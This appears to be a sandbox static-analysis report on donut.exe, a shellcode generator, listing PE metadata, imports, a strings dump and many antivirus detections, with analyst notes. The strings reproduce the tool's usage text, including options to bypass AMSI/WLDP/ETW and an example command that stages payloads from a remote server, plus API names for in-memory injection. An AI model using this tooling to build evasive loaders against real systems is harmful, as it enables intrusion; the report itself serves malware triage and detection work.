Static | ZeroBOX

PE Compile Time

2023-03-04 03:33:23 (Note: the binary's own usage banner string, further down in the strings section, reads "built Mar 3 2023 13:33:22", which does not agree with this header value. The difference may be a time-zone rendering on the sandbox side, but the PE header timestamp is a trivially editable field in any case; treat it as indicative rather than authoritative when building a timeline.)

PE Imphash

ef81b9a18c758ad2cb875d81e1e4b658 (Note: the imphash is computed from the static import table only, which here is largely the MSVC CRT start-up set plus CryptGenRandom and the clipboard APIs. It does not reflect the wininet/mscoree/ntdll/AMSI/ETW names that appear only as strings and are resolved at run time, so imphash matches for this sample may be shared with unrelated MSVC console tools.)

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00022a80 0x00022c00 6.42398042488
.rdata 0x00024000 0x0000b2b0 0x0000b400 5.03958322958
.data 0x00030000 0x0000a920 0x00009600 6.18690056079
.pdata 0x0003b000 0x00001a28 0x00001c00 5.08179560243
_RDATA 0x0003d000 0x0000015c 0x00000200 2.81232378784
.rsrc 0x0003e000 0x000028d8 0x00002a00 2.88583718295
.reloc 0x00041000 0x000007a0 0x00000800 5.34056677988

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0003e0f0 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 (Note: the "dBase IV DBT" label is a libmagic heuristic misfire on raw icon bitmap bytes, a common false identification for RT_ICON data; it is not evidence of an embedded database file.)
RT_GROUP_ICON 0x00040698 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x000406b0 0x00000228 LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports (Note: the table below is the generator executable's static import table. The loader-side API names listed in the strings section — kernel32 VirtualAlloc/VirtualProtect/CreateThread, wininet HttpOpenRequestA/HttpSendRequestA, mscoree CorBindToRuntime/CLRCreateInstance, ntdll NtCreateSection/NtMapViewOfSection/NtContinue, and the AmsiScanBuffer / WldpQueryDynamicCodeTrust / EtwEventWrite names — are not imported here; they are embedded as strings and, given the "--bypass" and "--exit" options in the usage text, appear to belong to the generated loader template that resolves them at run time. Detection logic based on this import table alone will not capture that behaviour.)

Library ADVAPI32.dll:
0x140024000 CryptReleaseContext
0x140024008 CryptGenRandom
0x140024010 CryptAcquireContextA
Library USER32.dll:
0x140024310 SetClipboardData
0x140024318 CloseClipboard
0x140024320 OpenClipboard
0x140024328 EmptyClipboard
Library KERNEL32.dll:
0x140024020 HeapSize
0x140024028 GetTimeZoneInformation
0x140024030 FlushFileBuffers
0x140024038 ReadConsoleW
0x140024040 ReadFile
0x140024048 CloseHandle
0x140024050 MapViewOfFile
0x140024058 UnmapViewOfFile
0x140024060 GetModuleHandleA
0x140024068 GetProcAddress
0x140024070 CreateFileMappingA
0x140024078 GlobalAlloc
0x140024080 GlobalLock
0x140024088 GlobalFree
0x140024090 RtlCaptureContext
0x140024098 RtlLookupFunctionEntry
0x1400240a0 RtlVirtualUnwind
0x1400240a8 UnhandledExceptionFilter
0x1400240b8 GetCurrentProcess
0x1400240c0 TerminateProcess
0x1400240d0 QueryPerformanceCounter
0x1400240d8 GetCurrentProcessId
0x1400240e0 GetCurrentThreadId
0x1400240e8 GetSystemTimeAsFileTime
0x1400240f0 InitializeSListHead
0x1400240f8 IsDebuggerPresent
0x140024100 GetStartupInfoW
0x140024108 GetModuleHandleW
0x140024110 SetEndOfFile
0x140024118 RtlUnwindEx
0x140024120 GetLastError
0x140024128 SetLastError
0x140024130 EnterCriticalSection
0x140024138 LeaveCriticalSection
0x140024140 DeleteCriticalSection
0x140024150 TlsAlloc
0x140024158 TlsGetValue
0x140024160 TlsSetValue
0x140024168 TlsFree
0x140024170 FreeLibrary
0x140024178 LoadLibraryExW
0x140024180 EncodePointer
0x140024188 RaiseException
0x140024190 RtlPcToFileHeader
0x140024198 RtlUnwind
0x1400241a0 ExitProcess
0x1400241a8 GetModuleHandleExW
0x1400241b0 CreateFileW
0x1400241b8 GetDriveTypeW
0x1400241c8 GetFileType
0x1400241d0 PeekNamedPipe
0x1400241e0 FileTimeToSystemTime
0x1400241e8 SetStdHandle
0x1400241f0 GetStdHandle
0x1400241f8 WriteFile
0x140024200 GetModuleFileNameW
0x140024208 GetCommandLineA
0x140024210 GetCommandLineW
0x140024218 HeapAlloc
0x140024220 HeapFree
0x140024228 FlsAlloc
0x140024230 FlsGetValue
0x140024238 FlsSetValue
0x140024240 FlsFree
0x140024248 CompareStringW
0x140024250 LCMapStringW
0x140024258 GetConsoleOutputCP
0x140024260 GetConsoleMode
0x140024268 GetFileSizeEx
0x140024270 SetFilePointerEx
0x140024278 GetCurrentDirectoryW
0x140024280 GetFullPathNameW
0x140024288 MultiByteToWideChar
0x140024290 HeapReAlloc
0x140024298 FindClose
0x1400242a0 FindFirstFileExW
0x1400242a8 FindNextFileW
0x1400242b0 IsValidCodePage
0x1400242b8 GetACP
0x1400242c0 GetOEMCP
0x1400242c8 GetCPInfo
0x1400242d0 WideCharToMultiByte
0x1400242d8 GetEnvironmentStringsW
0x1400242e0 FreeEnvironmentStringsW
0x1400242e8 SetEnvironmentVariableW
0x1400242f0 GetStringTypeW
0x1400242f8 GetProcessHeap
0x140024300 WriteConsoleW

!This program cannot be run in DOS mode.
Rich;)
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
VAVAWH
PA_A^^
|$ ATAUAVH
A^A]A\
|$ ATAUAVH
A^A]A\
D;l$`u
D$\;D$<|'A+
D;l$hs
H9D$Hrc
H9D$Hs:
D$ HcD$ H;
s+HcD$
HcL$ H
HcD$ H
D$0HcD$0
D$(HcD$(Hk
tcHcD$(Hk
D$8HcD$(Hk
H3D$8HcL$(H
t(HcD$PL
HcD$$H
HcD$(H
HcD$(H
D$,HcD$,L
HcD$,H
wlHcD$@H
D$(9D$ s&
D$H9D$ sy3
D$H9D$ sl3
D$H9D$ s>
D$H9D$ s>
D$H9D$ s#
H3E H3E
u/HcH<H
ffffff
fffffff
fffffff
ffffff
vKfffff
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
0A_A^A]A\_
D$(H!L$ E3
;D$hsC
x AUAVAWH
0A_A^A]
x UAVAWH
D$@H;F
kL@8o(u
<htl<jt\<lt4<tt$<wt
|$ UATAUAVAWH
<Ct-<D
<St[A:
u<g~l<it[<ntP<ot,<pt
<utK@:
{,D+{HD+
A_A^A]A\]
WAVAWH
~,*u<I
A_A^_
u3HcH<H
WATAUAVAWH
0A_A^A]A\_
UVWATAUAVAWH
rsf;\$d
r_f;\$l
rKf;\$t
r7f;\$|
f;\$4r
f;\$<r
f;\$Dr
f;\$Lr
rvf;\$d
rbf;\$l
rNf;\$t
r:f;\$|
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
UVWAVAWH
A_A^_^]
:u(f9Q
utfD9A
ugfD9A
ATAVAWH
0A_A^A\
x ATAVAWH
A_A^A\
UVWAVAWH
0A_A^_^]
WAVAWH
fA9,@u
fA9,vu
0A_A^_
p0R^G'
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
t#HcL$`H
s WAVAWH
0A_A^_
u~9t$Xt
UATAUAVAWH
A_A^A]A\]
D$0@8{
p*W4H
p*W4H
WATAUAVAWH
A_A^A]A\_
p0R^G'
L$ VWAVH
fD9t$b
UVWATAUAVAWH
fB9<A}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
AUAVAWH
@A_A^A]
@USVWATAUAVAWH
H!D$ I
hA_A^A]A\_^[]
D$0H9D$8
WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
L$ VWAVH
fD94H}aD
f9|$ tyf
|$":uq
f9)u4H9j
u%@8j(t
WAVAWH
@A_A^_
@USVWATAUAVAWH
xA_A^A]A\_^[]
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
UVWATAUAVAWH
xWI96tRI
0A_A^A]A\_^]
WATAUAVAWH
fB94ht
xXI96tSI
fC94wu
0A_A^A]A\_
@UATAUAVAWH
e0A_A^A]A\]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
x ATAVAWH
@8~8t
@8~0tM
A_A^A\
@SUVWATAUAVH
s5fE9!
fE9!fA
D$pfA;
NfD9d$pu
fD9d$pt+fD
0A^A]A\_^][
UVWATAUAVAWH
0A_A^A]A\_^]
SUWATAUAVAWH
`A_A^A]A\_][
AUAVAWH
@A_A^A]
WAVAWH
A_A^_
WATAUAVAWH
0A_A^A]A\_
x ATAVAWH
0A_A^A\
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
@USVWAVH
pA^_^[]
T$`fA;
p WATAUAVAWH
A_A^A]A\_
T$xD;D$x
@USVWATAVAWH
fD9$Ou
0A_A^A\_^[]
fD9$wu
}HfD9#A
\$ UVWH
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
H!T$0D
u,!T$(H!T$
A_A^A]A\]
x UAVAWH
@SUVWATAVAWH
@A_A^A\_^][
ffffff
fffffff
@USVWATAUAVAWH
eHA_A^A]A\_^[]
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
t"HcM`H
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
aPLib v1.1.1 - the smaller the better :)
Copyright (c) 1998-2014 Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
(null)
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
UTF-16LEUNICODE
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
CryptAcquireContextA
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
OpenClipboard
CloseClipboard
SetClipboardData
EmptyClipboard
USER32.dll
CloseHandle
MapViewOfFile
UnmapViewOfFile
GetModuleHandleA
GetProcAddress
CreateFileMappingA
GlobalAlloc
GlobalLock
GlobalFree
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
KERNEL32.dll
RtlUnwindEx
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
EncodePointer
RaiseException
RtlPcToFileHeader
RtlUnwind
ExitProcess
GetModuleHandleExW
CreateFileW
GetDriveTypeW
GetFileInformationByHandle
GetFileType
PeekNamedPipe
SystemTimeToTzSpecificLocalTime
FileTimeToSystemTime
SetStdHandle
GetStdHandle
WriteFile
GetModuleFileNameW
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
CompareStringW
LCMapStringW
GetConsoleOutputCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
GetCurrentDirectoryW
GetFullPathNameW
MultiByteToWideChar
HeapReAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetStringTypeW
GetProcessHeap
SetEndOfFile
ReadFile
ReadConsoleW
FlushFileBuffers
GetTimeZoneInformation
HeapSize
WriteConsoleW
D$4Wj<3
L$lYPh
L$$QPW
D$$PVW
D$$PVW
D$(+D$,
D$@vf3
D$XPVh
zVRVQh
EP;D$<
XPVVh
D$4PVVV
D$<f;N
;HPsCf
|$Tj>Y
D$4PQQQ
H9D$$s
L$0QVPR
D$$;D$
VVVVVUP
WAVAWH
H!|$(L
UVWAVAWH
A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
USVWATAUAVAWH
H3D$ H;
A_A^A]A\_^[]
L9[0t.M
VWATAVAWH
A_A^A\_^
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
D$D+D$HA
D9l$@v;A
A_A^A]A\_^]
USVWATAUAVAWH
D$XA9FP
@8;teH
A;D$PsmA
A_A^A]A\_^[]
D87tAE9
A88t.H
t$ UWAVH
t$ WATAUAVAWH
A_A^A]A\_
t9HcC<
UVWATAUAVAWH
A_A^A]A\_^]
t$ WAVAWH
0A_A^_
UATAVH
kernel32.dll
LoadLibraryA
kernel32.dll
GetProcAddress
kernel32.dll
GetModuleHandleA
kernel32.dll
VirtualAlloc
kernel32.dll
VirtualFree
kernel32.dll
VirtualQuery
kernel32.dll
VirtualProtect
kernel32.dll
kernel32.dll
MultiByteToWideChar
kernel32.dll
GetUserDefaultLCID
kernel32.dll
WaitForSingleObject
kernel32.dll
CreateThread
kernel32.dll
CreateFileA
kernel32.dll
GetFileSizeEx
kernel32.dll
GetThreadContext
kernel32.dll
GetCurrentThread
kernel32.dll
GetCurrentProcess
kernel32.dll
GetCommandLineA
kernel32.dll
GetCommandLineW
kernel32.dll
HeapAlloc
kernel32.dll
HeapReAlloc
kernel32.dll
GetProcessHeap
kernel32.dll
HeapFree
kernel32.dll
GetLastError
kernel32.dll
CloseHandle
shell32.dll
CommandLineToArgvW
oleaut32.dll
SafeArrayCreate
oleaut32.dll
SafeArrayCreateVector
oleaut32.dll
SafeArrayPutElement
oleaut32.dll
SafeArrayDestroy
oleaut32.dll
SafeArrayGetLBound
oleaut32.dll
SafeArrayGetUBound
oleaut32.dll
SysAllocString
oleaut32.dll
SysFreeString
oleaut32.dll
LoadTypeLib
wininet.dll
InternetCrackUrlA
wininet.dll
InternetOpenA
wininet.dll
InternetConnectA
wininet.dll
InternetSetOptionA
wininet.dll
InternetReadFile
wininet.dll
InternetQueryDataAvailable
wininet.dll
InternetCloseHandle
wininet.dll
HttpOpenRequestA
wininet.dll
HttpSendRequestA
wininet.dll
HttpQueryInfoA
mscoree.dll
CorBindToRuntime
mscoree.dll
CLRCreateInstance
ole32.dll
CoInitializeEx
ole32.dll
CoCreateInstance
ole32.dll
CoUninitialize
ntdll.dll
RtlEqualUnicodeString
ntdll.dll
RtlEqualString
ntdll.dll
RtlUnicodeStringToAnsiString
ntdll.dll
RtlInitUnicodeString
ntdll.dll
RtlExitUserThread
ntdll.dll
RtlExitUserProcess
ntdll.dll
RtlCreateUnicodeString
ntdll.dll
RtlGetCompressionWorkSpaceSize
ntdll.dll
RtlDecompressBuffer
ntdll.dll
NtContinue
ntdll.dll
NtCreateSection
ntdll.dll
NtMapViewOfSection
ntdll.dll
NtUnmapViewOfSection
Xntdll
RtlGetCompressionWorkSpaceSize
RtlCompressBuffer
v4.0.30319
HMN34P67R9TWCXYF
ole32;oleaut32;wininet;mscoree;shell32
WScript
wscript.exe
AmsiInitialize
AmsiScanBuffer
AmsiScanString
WldpQueryDynamicCodeTrust
WldpIsClassInApprovedList
EtwEventWrite
EtwEventUnregister
kernelbase
_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv
ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit
loader.bin
loader.b64
loader.rb
loader.c
thread
loader.py
loader.ps1
loader.cs
base64
loader.hex
loader.uuid
http://
https://
python
No error.
csharp
File not found.
File is empty.
Cannot open file.
File is invalid.
File is a .NET DLL. Donut requires a class and method.
Memory allocation failed.
Invalid architecture specified.
Invalid URL.
Invalid URL length.
Invalid parameter.
Error generating random values.
Invalid bypass option specified.
Unable to locate DLL function provided. Names are case sensitive.
bypass
Target architecture cannot support selected DLL/EXE file.
You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.
Invalid PE headers preservation option.
The output format is invalid.
The compression engine is invalid.
There was an error during compression.
Invalid entropy level specified.
Path of decoy module is invalid.
Mixed (native and managed) assemblies are currently unsupported.
process
WARNING: Invalid architecture specified: %d -- setting to x86+amd64
WARNING: Invalid exit option specified: %d -- setting to thread
WARNING: Invalid entropy option specified: %d -- setting to default
powershell
WARNING: Invalid format specified: %d -- setting to binary.
usage: donut [options] <EXE/DLL/VBS/JS>
Only the finest artisanal donuts are made of shells.
-MODULE OPTIONS-
-FILE OPTIONS-
-n,--modname: <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.
-PIC/SHELLCODE OPTIONS-
donut -ic2.dll
-s,--server: <server> Server that will host the Donut module. Credentials may be provided in the following format: https://username:password@192.168.0.1/
-e,--entropy: <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
[ Donut shellcode generator v1 (built Mar 3 2023 13:33:22)
-a,--arch: <arch>,--cpu: <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
-o,--output: <path> Output file to save loader. Default is "loader.bin"
-f,--format: <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y,--fork: <addr> Create thread for loader and continue execution at <addr> supplied.
-x,--exit: <action> Exit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely
-c,--class: <namespace.class> Optional class name. (required for .NET DLL)
-d,--domain: <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
-i,--input: <path>,--file: <path> Input file to execute in-memory.
-EXTRA-
[ Copyright (c) 2019-2021 TheWover, Odzhan
headers
-m,--method: <method>,--function: <api> Optional method or function for DLL. (a method is required for .NET DLL)
-p,--args: <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.
examples:
domain
-w,--unicode Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
entropy
-r,--runtime: <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
x86+amd64
format
-t,--thread Execute the entrypoint of an unmanaged EXE as a thread.
-z,--compress: <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
-b,--bypass: <level> Bypass AMSI/WLDP/ETW : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
-k,--headers: <level> Preserve PE headers. 1=Overwrite (default), 2=Keep all
-j,--decoy: <level> Optional path of decoy module for Module Overloading.
method;function
donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
input;file
modname
donut -iloader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
Embedded
output
params;args
runtime
server
thread
unicode
oep;fork
compress
[ Error : %s
.NET DLL
Xpress
.NET EXE
VBScript
JScript
Unrecognized
[ Instance type : %s
[ Module file : "%s"
Random Names
Random names + Encryption
[ Entropy : %s
[ Compressed : %s (Reduced by %d%%)
[ File type : %s
[ Class : %s
[ Method : %s
Default
[ Domain : %s
DllMain
[ Function : %s
[ Parameters : %s
[ Target CPU : %s
[ Module name : %s
[ Upload to : %s
continue
[ AMSI/WDLP/ETW : %s
overwrite
Undefined
[ PE Headers : %s
[ Shellcode : "%s"
[ OEP : 0x%X
[ Decoy path : %s
Thread
Process
Undefined
[ Exit : %s
unsigned char buf[] =
\x%02x
buf = ""
buff += "
\x%02x
[Byte[]] $buf =
0x%02x
byte[] my_buf = new byte[%d] {
0x%02x
\x%02x
%02x%02x%02x%02x-
%02x%02x-
%02x%02x-
%02x%02x-
%02x%02x%02x%02x%02x%02x
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
VS_VERSION_INFO
StringFileInfo
080904E4
FileDescription
Donut shellcode generator
FileVersion
InternalName
OriginalFilename
donut.exe
ProductName
ProductVersion
VarFileInfo
Translation
Antivirus Signature (Note: the version resource identifies this file as donut.exe, "Donut shellcode generator", and the usage banner names it as Donut v1 by TheWover/Odzhan — the builder tool, not a generated loader payload. The vendor names below agree ("Donut", "DonutLoader", "ShellCode.Donut"). The signatures most likely key on the embedded loader template strings (AmsiScanBuffer, EtwEventWrite, WldpQueryDynamicCodeTrust, NtMapViewOfSection). Finding this binary on a host points to the presence of the builder; the loader it emits is a separate artifact and is what would actually run in a target process.)
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Donut.4!c
Elastic Windows.Trojan.Donutloader
ClamAV Win.Packed.Rozena-10029918-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh RDN/Generic.grp
ALYac Generic.ShellCode.Donut.Marte.4.FBD50004
Cylance Unsafe
Zillya Trojan.Donut.Win64.2364
Sangfor Trojan.Win64.Donut.Vcgt
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win64/Donut.41861a6e
K7GW Riskware ( 00584baa1 )
K7AntiVirus Riskware ( 00584baa1 )
huorong Trojan/Donut.g
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast Win32:Donut-A [Inj]
Cynet Malicious (score: 99)
Kaspersky Trojan.Win64.Donut.ury
BitDefender Generic.ShellCode.Donut.Marte.4.FBD50004
NANO-Antivirus Trojan.Win64.Redcap.jvkudz
ViRobot Clean
MicroWorld-eScan Generic.ShellCode.Donut.Marte.4.FBD50004
Tencent Malware.Win32.Gencirc.11bbf5ac
Sophos Mal/Generic-S
F-Secure Heuristic.HEUR/AGEN.1374428
DrWeb Clean
VIPRE Generic.ShellCode.Donut.Marte.4.FBD50004
TrendMicro TROJ_GEN.R002C0XER23
McAfeeD ti!EE68D7DEB7CE
Trapmine Clean
CTX exe.trojan.donut
Emsisoft Generic.ShellCode.Donut.Marte.4.FBD50004 (B)
Ikarus Trojan.Win32.DonutLoader
FireEye Generic.ShellCode.Donut.Marte.4.FBD50004
Jiangmin Trojan.Donut.coe
Webroot W64.Trojan.Donut
Varist W64/ABTrojan.PRDT-7975
Avira HEUR/AGEN.1374428
Fortinet W32/PossibleThreat
Antiy-AVL Trojan/Win64.Generic
Kingsoft Win64.Trojan.Donut.ury
Gridinsoft Trojan.Win64.AI.cl
Xcitium Malware@#cay5l43advb0
Arcabit Generic.ShellCode.Donut.Marte.4.FBD50004
SUPERAntiSpyware Trojan.Agent/Gen-ShellcodeDonut
ZoneAlarm Trojan.Win64.Donut.ury
Microsoft Trojan:Win64/Donut.psyA!MTB
Google Detected
AhnLab-V3 Trojan/Win.Donut.R566854
Acronis Clean
McAfee RDN/Generic.grp
TACHYON Clean
VBA32 Trojan.Win64.Donut
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0XER23
Rising Trojan.DonutLoader!1.E39F (CLASSIC)
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.232086778.susgen
GData Generic.ShellCode.Donut.Marte.4.FBD50004
AVG Win32:Donut-A [Inj]
DeepInstinct MALICIOUS
alibabacloud Trojan:Win/Donut.pvkO3DGW
No IRMA results available.